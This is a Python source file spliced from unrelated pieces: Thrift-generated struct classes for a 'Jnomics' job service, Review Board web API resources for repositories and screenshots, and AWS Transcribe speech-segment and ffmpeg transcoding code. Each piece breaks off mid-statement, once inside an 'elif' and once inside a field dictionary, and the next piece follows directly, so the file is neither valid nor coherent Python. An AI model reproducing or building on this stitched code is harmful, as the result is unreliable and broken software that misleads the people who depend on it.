# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Authentication:
"""
Attributes:
- username
- password
- token
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'username', None, None, ), # 1
(2, TType.STRING, 'password', None, None, ), # 2
(3, TType.STRING, 'token', None, None, ), # 3
)
def __init__(self, username=None, password=None, token=None,):
self.username = username
self.password = password
self.token = token
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.username = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.password = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.token = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Authentication')
if self.username is not None:
oprot.writeFieldBegin('username', TType.STRING, 1)
oprot.writeString(self.username)
oprot.writeFieldEnd()
if self.password is not None:
oprot.writeFieldBegin('password', TType.STRING, 2)
oprot.writeString(self.password)
oprot.writeFieldEnd()
if self.token is not None:
oprot.writeFieldBegin('token', TType.STRING, 3)
oprot.writeString(self.token)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
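# Usage sketch (not part of the generated module; example values are assumed):
# round-trip an Authentication struct through an in-memory transport using the
# plain (non-accelerated) binary protocol.
def _roundtrip_example():
    wbuf = TTransport.TMemoryBuffer()
    auth = Authentication(username='alice', token='abc123')
    auth.write(TBinaryProtocol.TBinaryProtocol(wbuf))
    rbuf = TTransport.TMemoryBuffer(wbuf.getvalue())
    decoded = Authentication()
    decoded.read(TBinaryProtocol.TBinaryProtocol(rbuf))
    assert decoded == auth  # __eq__ compares the structs' __dict__
    return decoded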
class JnomicsThriftJobID:
"""
Attributes:
- job_id
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'job_id', None, None, ), # 1
)
def __init__(self, job_id=None,):
self.job_id = job_id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.job_id = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('JnomicsThriftJobID')
if self.job_id is not None:
oprot.writeFieldBegin('job_id', TType.STRING, 1)
oprot.writeString(self.job_id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class JnomicsThriftHandle:
"""
Attributes:
- uuid
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'uuid', None, None, ), # 1
)
def __init__(self, uuid=None,):
self.uuid = uuid
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.uuid = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('JnomicsThriftHandle')
if self.uuid is not None:
oprot.writeFieldBegin('uuid', TType.STRING, 1)
oprot.writeString(self.uuid)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class JnomicsThriftFileStatus:
"""
Attributes:
- isDir
- path
- owner
- group
- permission
- replication
- mod_time
- block_size
- length
"""
thrift_spec = (
None, # 0
(1, TType.BOOL, 'isDir', None, None, ), # 1
(2, TType.STRING, 'path', None, None, ), # 2
(3, TType.STRING, 'owner', None, None, ), # 3
(4, TType.STRING, 'group', None, None, ), # 4
(5, TType.STRING, 'permission', None, None, ), # 5
(6, TType.I16, 'replication', None, None, ), # 6
(7, TType.I64, 'mod_time', None, None, ), # 7
(8, TType.I64, 'block_size', None, None, ), # 8
(9, TType.I64, 'length', None, None, ), # 9
)
def __init__(self, isDir=None, path=None, owner=None, group=None, permission=None, replication=None, mod_time=None, block_size=None, length=None,):
self.isDir = isDir
self.path = path
self.owner = owner
self.group = group
self.permission = permission
self.replication = replication
self.mod_time = mod_time
self.block_size = block_size
self.length = length
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BOOL:
self.isDir = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.path = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.owner = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.group = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.permission = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I16:
self.replication = iprot.readI16();
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.I64:
self.mod_time = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.I64:
self.block_size = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.I64:
self.length = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('JnomicsThriftFileStatus')
if self.isDir is not None:
oprot.writeFieldBegin('isDir', TType.BOOL, 1)
oprot.writeBool(self.isDir)
oprot.writeFieldEnd()
if self.path is not None:
oprot.writeFieldBegin('path', TType.STRING, 2)
oprot.writeString(self.path)
oprot.writeFieldEnd()
if self.owner is not None:
oprot.writeFieldBegin('owner', TType.STRING, 3)
oprot.writeString(self.owner)
oprot.writeFieldEnd()
if self.group is not None:
oprot.writeFieldBegin('group', TType.STRING, 4)
oprot.writeString(self.group)
oprot.writeFieldEnd()
if self.permission is not None:
oprot.writeFieldBegin('permission', TType.STRING, 5)
oprot.writeString(self.permission)
oprot.writeFieldEnd()
if self.replication is not None:
oprot.writeFieldBegin('replication', TType.I16, 6)
oprot.writeI16(self.replication)
oprot.writeFieldEnd()
if self.mod_time is not None:
oprot.writeFieldBegin('mod_time', TType.I64, 7)
oprot.writeI64(self.mod_time)
oprot.writeFieldEnd()
if self.block_size is not None:
oprot.writeFieldBegin('block_size', TType.I64, 8)
oprot.writeI64(self.block_size)
oprot.writeFieldEnd()
if self.length is not None:
oprot.writeFieldBegin('length', TType.I64, 9)
oprot.writeI64(self.length)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class JnomicsThriftJobStatus:
"""
Attributes:
- job_id
- username
- failure_info
- complete
- running_state
- start_time
- priority
- mapProgress
- reduceProgress
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'job_id', None, None, ), # 1
(2, TType.STRING, 'username', None, None, ), # 2
(3, TType.STRING, 'failure_info', None, None, ), # 3
(4, TType.BOOL, 'complete', None, None, ), # 4
(5, TType.I32, 'running_state', None, None, ), # 5
(6, TType.I64, 'start_time', None, None, ), # 6
(7, TType.STRING, 'priority', None, None, ), # 7
(8, TType.DOUBLE, 'mapProgress', None, None, ), # 8
(9, TType.DOUBLE, 'reduceProgress', None, None, ), # 9
)
def __init__(self, job_id=None, username=None, failure_info=None, complete=None, running_state=None, start_time=None, priority=None, mapProgress=None, reduceProgress=None,):
self.job_id = job_id
self.username = username
self.failure_info = failure_info
self.complete = complete
self.running_state = running_state
self.start_time = start_time
self.priority = priority
self.mapProgress = mapProgress
self.reduceProgress = reduceProgress
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.job_id = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.username = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.failure_info = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.BOOL:
self.complete = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.running_state = iprot.readI32();
else:
iprot.skip(ftype)
elif
be used just before issuing a DELETE call, which will
# set the visibility flag to False
if kwargs.get('archive_name', False):
# This should be sufficiently unlikely to create duplicates. time()
# will use up a max of 8 characters, so we slice the name down to
# make the result fit in 64 characters
repository.name = 'ar:%s:%x' % (repository.name[:50], int(time()))
repository.save()
return 200, {
self.item_result_key: repository,
}
@webapi_check_local_site
@webapi_login_required
@webapi_response_errors(DOES_NOT_EXIST, NOT_LOGGED_IN, PERMISSION_DENIED)
def delete(self, request, *args, **kwargs):
"""Deletes a repository.
The repository will not actually be deleted from the database, as
that would also trigger a deletion of all review requests. Instead,
it marks a repository as no longer visible, which will hide it
in the UIs and in the API.
"""
try:
repository = self.get_object(request, *args, **kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
if not self.has_delete_permissions(request, repository):
return _no_access_error(request.user)
# We don't actually delete the repository. We instead just hide it.
# Otherwise, all the review requests are lost. By marking it as not
# visible, it'll be removed from the UI and from the list in the API.
repository.visible = False
repository.save()
return 204, {}
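# Hedged illustration (manager usage assumed; only the `visible` field is
# taken from the code above): the soft delete pairs with list queries that
# filter on the visibility flag, so hidden repositories drop out of listings
# while their review requests survive.
#     visible_repositories = Repository.objects.filter(visible=True)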
def _check_repository(self, scmtool_class, path, username, password,
local_site, trust_host):
if local_site:
local_site_name = local_site.name
else:
local_site_name = None
while 1:
# Keep doing this until we have an error we don't want
# to ignore, or it's successful.
try:
scmtool_class.check_repository(path, username, password,
local_site_name)
return None
except RepositoryNotFoundError:
return MISSING_REPOSITORY
except BadHostKeyError, e:
if trust_host:
try:
sshutils.replace_host_key(e.hostname,
e.raw_expected_key,
e.raw_key,
local_site_name)
except IOError, e:
return SERVER_CONFIG_ERROR, {
'reason': str(e),
}
else:
return BAD_HOST_KEY, {
'hostname': e.hostname,
'expected_key': e.raw_expected_key.get_base64(),
'key': e.raw_key.get_base64(),
}
except UnknownHostKeyError, e:
if trust_host:
try:
sshutils.add_host_key(e.hostname, e.raw_key,
local_site_name)
except IOError, e:
return SERVER_CONFIG_ERROR, {
'reason': str(e),
}
else:
return UNVERIFIED_HOST_KEY, {
'hostname': e.hostname,
'key': e.raw_key.get_base64(),
}
except UnverifiedCertificateError, e:
if trust_host:
try:
scmtool_class.accept_certificate(path, local_site_name)
except IOError, e:
return SERVER_CONFIG_ERROR, {
'reason': str(e),
}
else:
return UNVERIFIED_HOST_CERT, {
'certificate': {
'failures': e.certificate.failures,
'fingerprint': e.certificate.fingerprint,
'hostname': e.certificate.hostname,
'issuer': e.certificate.issuer,
'valid': {
'from': e.certificate.valid_from,
'until': e.certificate.valid_until,
},
},
}
except AuthenticationError, e:
if 'publickey' in e.allowed_types and e.user_key is None:
return MISSING_USER_KEY
else:
return REPO_AUTHENTICATION_ERROR, {
'reason': str(e),
}
except Exception, e:
logging.error('Unknown error in checking repository %s: %s',
path, e, exc_info=1)
# We should give something better, but I don't have anything.
# This will at least give a HTTP 500.
raise
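# Generic shape of the "trust and retry" loop above (names assumed): retry the
# check after every repairable error, and let anything else propagate. Here
# repair(e) returns a zero-argument callable that applies a fix, or None.
def check_with_trust(check, repair):
    while 1:
        try:
            return check()   # success ends the loop
        except Exception, e:
            fix = repair(e)  # e.g. accept a host key or certificate
            if fix is None:
                raise        # not a repairable error
            fix()            # apply the fix, then retry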
repository_resource = RepositoryResource()
class BaseScreenshotResource(WebAPIResource):
"""A base resource representing screenshots."""
model = Screenshot
name = 'screenshot'
fields = {
'id': {
'type': int,
'description': 'The numeric ID of the screenshot.',
},
'caption': {
'type': str,
'description': "The screenshot's descriptive caption.",
},
'path': {
'type': str,
'description': "The path of the screenshot's image file, "
"relative to the media directory configured "
"on the Review Board server.",
},
'url': {
'type': str,
'description': "The URL of the screenshot file. If this is not "
"an absolute URL (for example, if it is just a "
"path), then it's relative to the Review Board "
"server's URL.",
},
'thumbnail_url': {
'type': str,
'description': "The URL of the screenshot's thumbnail file. "
"If this is not an absolute URL (for example, "
"if it is just a path), then it's relative to "
"the Review Board server's URL.",
},
}
uri_object_key = 'screenshot_id'
autogenerate_etags = True
def get_queryset(self, request, review_request_id, is_list=False,
*args, **kwargs):
review_request = review_request_resource.get_object(
request, review_request_id, *args, **kwargs)
q = Q(review_request=review_request)
if not is_list:
q = q | Q(inactive_review_request=review_request)
if request.user == review_request.submitter:
try:
draft = review_request_draft_resource.get_object(
request, review_request_id, *args, **kwargs)
q = q | Q(drafts=draft)
if not is_list:
q = q | Q(inactive_drafts=draft)
except ObjectDoesNotExist:
pass
return self.model.objects.filter(q)
def serialize_path_field(self, obj):
return obj.image.name
def serialize_url_field(self, obj):
return obj.image.url
def serialize_thumbnail_url_field(self, obj):
return obj.get_thumbnail_url()
def serialize_caption_field(self, obj):
# We prefer 'caption' here, because when creating a new screenshot, it
# won't be full of data yet (and since we're posting to screenshots/,
# it doesn't hit DraftScreenshotResource). DraftScreenshotResource will
# prefer draft_caption, in case people are changing an existing one.
return obj.caption or obj.draft_caption
@webapi_check_local_site
@webapi_login_required
@webapi_response_errors(DOES_NOT_EXIST, NOT_LOGGED_IN, PERMISSION_DENIED,
INVALID_FORM_DATA)
@webapi_request_fields(
required={
'path': {
'type': file,
'description': 'The screenshot to upload.',
},
},
optional={
'caption': {
'type': str,
'description': 'The optional caption describing the '
'screenshot.',
},
},
)
def create(self, request, *args, **kwargs):
"""Creates a new screenshot from an uploaded file.
This accepts any standard image format (PNG, GIF, JPEG) and associates
it with a draft of a review request.
It is expected that the client will send the data as part of a
:mimetype:`multipart/form-data` mimetype. The screenshot's name
and content should be stored in the ``path`` field. A typical request
may look like::
-- SoMe BoUnDaRy
Content-Disposition: form-data; name=path; filename="foo.png"
<PNG content here>
-- SoMe BoUnDaRy --
"""
try:
review_request = \
review_request_resource.get_object(request, *args, **kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
if not review_request.is_mutable_by(request.user):
return _no_access_error(request.user)
form_data = request.POST.copy()
form = UploadScreenshotForm(form_data, request.FILES)
if not form.is_valid():
return INVALID_FORM_DATA, {
'fields': _get_form_errors(form),
}
try:
screenshot = form.create(request.FILES['path'], review_request)
except ValueError, e:
return INVALID_FORM_DATA, {
'fields': {
'path': [str(e)],
},
}
return 201, {
self.item_result_key: screenshot,
}
@webapi_check_local_site
@webapi_login_required
@webapi_request_fields(
optional={
'caption': {
'type': str,
'description': 'The new caption for the screenshot.',
},
}
)
@webapi_response_errors(DOES_NOT_EXIST, NOT_LOGGED_IN, PERMISSION_DENIED)
def update(self, request, caption=None, *args, **kwargs):
"""Updates the screenshot's data.
This allows updating the screenshot in a draft. The caption, currently,
is the only thing that can be updated.
"""
try:
review_request = \
review_request_resource.get_object(request, *args, **kwargs)
screenshot = screenshot_resource.get_object(request, *args,
**kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
if not review_request.is_mutable_by(request.user):
return _no_access_error(request.user)
try:
review_request_draft_resource.prepare_draft(request,
review_request)
except PermissionDenied:
return _no_access_error(request.user)
screenshot.draft_caption = caption
screenshot.save()
return 200, {
self.item_result_key: screenshot,
}
@webapi_check_local_site
@webapi_login_required
@webapi_response_errors(DOES_NOT_EXIST, NOT_LOGGED_IN, PERMISSION_DENIED)
def delete(self, request, *args, **kwargs):
try:
review_request = \
review_request_resource.get_object(request, *args, **kwargs)
screenshot = screenshot_resource.get_object(request, *args,
**kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
try:
draft = review_request_draft_resource.prepare_draft(request,
review_request)
except PermissionDenied:
return _no_access_error(request.user)
draft.screenshots.remove(screenshot)
draft.inactive_screenshots.add(screenshot)
draft.save()
return 204, {}
class DraftScreenshotResource(BaseScreenshotResource):
"""Provides information on new screenshots being added to a draft of
a review request.
These are screenshots that will be shown once the pending review request
draft is published.
"""
name = 'draft_screenshot'
uri_name = 'screenshots'
model_parent_key = 'drafts'
allowed_methods = ('GET', 'DELETE', 'POST', 'PUT',)
def get_queryset(self, request, review_request_id, *args, **kwargs):
try:
draft = review_request_draft_resource.get_object(
request, review_request_id, *args, **kwargs)
inactive_ids = \
draft.inactive_screenshots.values_list('pk', flat=True)
q = Q(review_request=review_request_id) | Q(drafts=draft)
query = self.model.objects.filter(q)
query = query.exclude(pk__in=inactive_ids)
return query
except ObjectDoesNotExist:
return self.model.objects.none()
def serialize_caption_field(self, obj):
return obj.draft_caption or obj.caption
@webapi_check_local_site
@webapi_login_required
@augment_method_from(WebAPIResource)
def get(self, *args, **kwargs):
pass
@webapi_check_local_site
@webapi_login_required
@augment_method_from(WebAPIResource)
def delete(self, *args, **kwargs):
"""Deletes the screenshot from the draft.
This will remove the screenshot from the draft review request.
This cannot be undone.
This can be used to remove old screenshots that were previously
shown, as well as newly added screenshots that were part of the
draft.
Instead of a payload response on success, this will return :http:`204`.
"""
pass
@webapi_check_local_site
@webapi_login_required
@augment_method_from(WebAPIResource)
def get_list(self, *args, **kwargs):
"""Returns a list of draft screenshots.
Each screenshot in this list is an uploaded screenshot that will
be shown in the final review request. These may include newly
uploaded screenshots or screenshots that were already part of the
existing review request. In the latter case, existing screenshots
are shown so that their captions can be added.
"""
pass
def _get_list_impl(self, request, *args, **kwargs):
"""Returns the list of screenshots on this draft.
This is a specialized version of the standard get_list function
that uses this resource to serialize the children, in order to
guarantee that we'll be able to identify them as screenshots that are
part of the draft.
"""
return WebAPIResponsePaginated(
request,
queryset=self.get_queryset(request, is_list=True,
*args, **kwargs),
results_key=self.list_result_key,
serialize_object_func=
lambda obj: self.serialize_object(obj, request=request,
*args, **kwargs),
extra_data={
'links': self.get_links(self.list_child_resources,
request=request, *args, **kwargs),
},
**self.build_response_args(request))
draft_screenshot_resource = DraftScreenshotResource()
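# Illustrative client-side sketch (not part of the original module): one way a
# script might exercise the draft screenshot resource above over HTTP. The host
# name, review request ID, credentials, and exact URL layout are assumptions
# for the example; the resource itself only declares uri_name 'screenshots'
# under a review request draft, and create() expects the file in 'path'.
#
#     import requests
#
#     with open('foo.png', 'rb') as f:
#         rsp = requests.post(
#             'https://reviews.example.com/api/review-requests/42/draft/screenshots/',
#             files={'path': f},
#             data={'caption': 'Before my change'},
#             auth=('username', 'password'),
#         )
#     rsp.json()['draft_screenshot']['caption']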
class BaseFileAttachmentResource(WebAPIResource):
"""A base resource representing file attachments."""
model = FileAttachment
name = 'file_attachment'
fields = {
'id': {
'type': int,
'description': 'The numeric ID of the file.',
# If the speaker has changed, or there is a gap in time since the last word, start a new speech
# segment
if (nextSpeaker != lastSpeaker) or ((nextSpeaker == lastSpeaker) and ((nextStartTime - lastEndTime) > 0.1)):
nextSpeechSegment = SpeechSegment()
speechSegmentList.append(nextSpeechSegment)
nextSpeechSegment.segmentStartTime = nextStartTime
nextSpeechSegment.segmentSpeaker = nextSpeaker
skipLeadingSpace = True
confidenceList = []
nextSpeechSegment.segmentConfidence = confidenceList
nextSpeechSegment.segmentEndTime = nextEndTime
# Note the speaker and end time of this segment for the next iteration
lastSpeaker = nextSpeaker
lastEndTime = nextEndTime
# Get the word with the highest confidence
pronunciations = list(filter(lambda x: x["type"] == "pronunciation", channel["items"]))
word_result = list(filter(lambda x: x["start_time"] == word["start_time"] and x["end_time"] == word["end_time"], pronunciations))
try:
result = sorted(word_result[-1]["alternatives"], key=lambda x: x["confidence"])[-1]
confidence = float(result["confidence"])
except:
result = word_result[-1]["alternatives"][0]
confidence = float(result["redactions"][0]["confidence"])
# If we're doing simple entities then track which entities have been seen so far
if self.simpleEntityMap != {}:
checkTerm = result["content"].lower()
if checkTerm in self.simpleEntityMap:
self.matchedSimpleEntities[checkTerm] = self.simpleEntityMap[checkTerm]
# Write the word, and a leading space if this isn't the start of the segment
if (skipLeadingSpace):
skipLeadingSpace = False
wordToAdd = result["content"]
else:
wordToAdd = " " + result["content"]
# If the next item is punctuation, add it to the current word
try:
word_result_index = channel["items"].index(word_result[0])
next_item = channel["items"][word_result_index + 1]
if next_item["type"] == "punctuation":
wordToAdd += next_item["alternatives"][0]["content"]
except IndexError:
pass
# Add word and confidence to the segment and to our overall stats
nextSpeechSegment.segmentText += wordToAdd
confidenceList.append({"Text": wordToAdd, "Confidence": confidence,
"StartTime": float(word["start_time"]), "EndTime": float(word["end_time"])})
self.numWordsParsed += 1
self.cummulativeWordAccuracy += confidence
# Sort the segments, as they are in channel-order and not speaker-order, then
# merge together turns from the same speaker that are very close together
speechSegmentList = sorted(speechSegmentList, key=lambda segment: segment.segmentStartTime)
speechSegmentList = self.mergeSpeakerSegments(speechSegmentList)
# Inject sentiments into the segment list
self.performComprehendNLP(speechSegmentList)
# If we ended up with any matched simple entities then insert
# them, which we can now do as we now have the sentence order
if self.matchedSimpleEntities != {}:
self.createSimpleEntityEntries(speechSegmentList)
# Now set the overall call duration if we actually had any speech
if len(speechSegmentList) > 0:
self.duration = float(speechSegmentList[-1].segmentConfidence[-1]["EndTime"])
# Return our full turn-by-turn speaker segment list with sentiment
return speechSegmentList
def createSimpleEntityEntries(self, speechSegments):
"""
Searches through the speech segments given and updates them with any of the simple entity mapping
entries that we've found. It also updates the line-level items. Both methods simulate the same
response that we'd generate if this was via Standard or Custom Comprehend Entities
"""
# Loop through each segment looking for matches in our cut-down entity list
for entity in self.matchedSimpleEntities:
# Start by recording this in the header
entityEntry = self.matchedSimpleEntities[entity]
self.updateHeaderEntityCount(entityEntry["Type"], entityEntry["Original"])
# Work through each segment
for segment in speechSegments:
# Stop if the entity chars appear somewhere
if entity in segment.segmentText.lower():
# Now find the right spot in the segment (if any) and insert that entry
offsetStart = 0
for wordEntry in segment.segmentConfidence:
nextWord = wordEntry["Text"].lower().strip(" ,?.")
offsetEnd = offsetStart + len(wordEntry["Text"])
if entity == nextWord:
# Got a match - add this one on
newLineEntity = {}
newLineEntity["Score"] = 1.0
newLineEntity["Type"] = entityEntry["Type"]
newLineEntity["Text"] = wordEntry["Text"].strip(" ,?.")
newLineEntity["BeginOffset"] = offsetStart
newLineEntity["EndOffset"] = offsetEnd
segment.segmentCustomEntities.append(newLineEntity)
offsetStart = offsetEnd
def calculateTranscribeConversationTime(self, filename):
'''
Tries to work out the conversation time based upon patterns in the filename. Currently,
the POC customer has this format - 0a.93.a0.3e.00.00-09.25.51.067-09-26-2019.wav, but there
may be others, and hence this may need to be a plug-in per customer or something later. If
we cannot generate a time then the system later defaults to the current time.
'''
try:
# Filename = 0a.93.a0.3e.00.00-09.25.51.067-09-26-2019.wav
match = re.search(r'\d{2}\.\d{2}\.\d{2}\.\d{3}-\d{2}-\d{2}-\d{4}', filename)
self.conversationTime = str(datetime.strptime(match.group(), '%H.%M.%S.%f-%m-%d-%Y'))
self.conversationLocation = cf.appConfig[cf.CONF_CONVO_LOCATION]
except:
# If everything fails system will use "now" as the datetime in UTC
self.conversationLocation = "Etc/UTC"
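# Worked example (values taken from the sample filename in the docstring above):
# re.search pulls "09.25.51.067-09-26-2019" out of
# "0a.93.a0.3e.00.00-09.25.51.067-09-26-2019.wav", and strptime with format
# '%H.%M.%S.%f-%m-%d-%Y' turns it into "2019-09-26 09:25:51.067000".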
def loadSimpleEntityStringMap(self):
"""
Loads in any defined simple entity map for later use - this must be a CSV file, but it will be defined
without a language code. We will append the Comprehend language code to the filename and use that,
as that will give us multi-language coverage with a single file.
Example: Configured File = entityFile.csv -> Processed File for en-US audio = entityFile-en.csv
"""
if self.simpleEntityMatchingUsed:
# First, need to build up the real filename to use for this language. If we don't
# have a language (unlikely) then just try to use the base filename as a last resort
key = cf.appConfig[cf.CONF_ENTITY_FILE]
if (self.comprehendLanguageCode != ""):
key = key.split('.csv')[0] + "-" + self.comprehendLanguageCode + ".csv"
# Then check that the language-specific mapping file actually exists
s3 = boto3.client("s3")
bucket = cf.appConfig[cf.CONF_SUPPORT_BUCKET]
try:
response = s3.get_object(Bucket=bucket, Key=key)
except Exception as e:
# Mapping file doesn't exist, so just quietly exit but log something
print("ERROR: Configured simple entity file {} in bucket {} does not exist - entity detection not possible".format(key, bucket))
self.simpleEntityMatchingUsed = False
return
# Go download the mapping file and get it into a structure
mapFilepath = TMP_DIR + '/' + cf.appConfig[cf.CONF_ENTITY_FILE]
s3.download_file(bucket, key, mapFilepath)
reader = csv.DictReader(open(mapFilepath, errors="ignore"))
try:
for row in reader:
origTerm = row.pop("Text")
checkTerm = origTerm.lower()
if not (checkTerm in self.simpleEntityMap):
self.simpleEntityMap[checkTerm] = { "Type": row.pop("Type"), "Original": origTerm }
except Exception as e:
print(e)
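# Illustrative sketch of the mapping file this method consumes. The "Text" and
# "Type" column names are taken from the row.pop() calls above; the rows
# themselves are invented for the example:
#
#     Text,Type
#     visa,CREDIT_CARD
#     mastercard,CREDIT_CARD
#     acme,ORGANIZATION
#
# With CONF_ENTITY_FILE = "entityFile.csv" and en-US audio, the object actually
# fetched from S3 would be "entityFile-en.csv", per the docstring above.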
def createPlaybackMP3Audio(self):
"""
Creates an MP3 version of the audio file used in the Transcribe job, as the HTML5 <audio> playback
controller cannot play them back if they are GSM-encoded 8kHz WAV files. Still need to work out how
to check for the encoding type via FFMPEG, but we do get the other info from Transcribe.
Note - if the source audio is in a bucket that isn't the standard one, e.g. it's the alternate location,
then the audio is always transcoded, as the UI may not have access to that bucket for playback
"""
# Get some info on the audio file before continuing
s3Object = urlparse(self.transcribeJobInfo["Media"]["MediaFileUri"])
bucket = s3Object.netloc
# 8Khz WAV or non-standard bucket audio gets converted
if (bucket != cf.appConfig[cf.CONF_S3BUCKET_INPUT]) or\
((self.transcribeJobInfo["MediaFormat"] == "wav") and (self.transcribeJobInfo["MediaSampleRateHertz"] == 8000)):
# First, we need to download the original audio file
fileObject = s3Object.path.lstrip('/')
inputFilename = TMP_DIR + '/' + fileObject.split('/')[-1]
outputFilename = inputFilename.split('.wav')[0] + '.mp3'
s3Client = boto3.client('s3')
s3Client.download_file(bucket, fileObject, inputFilename)
# Transform the file via FFMPEG - this will exception if not installed
try:
# Just convert from source to destination format
subprocess.call(['ffmpeg', '-nostats', '-loglevel', '0', '-y', '-i', inputFilename, outputFilename], stdin=subprocess.DEVNULL)
# Now upload the output file to the configured playback folder in the main input bucket
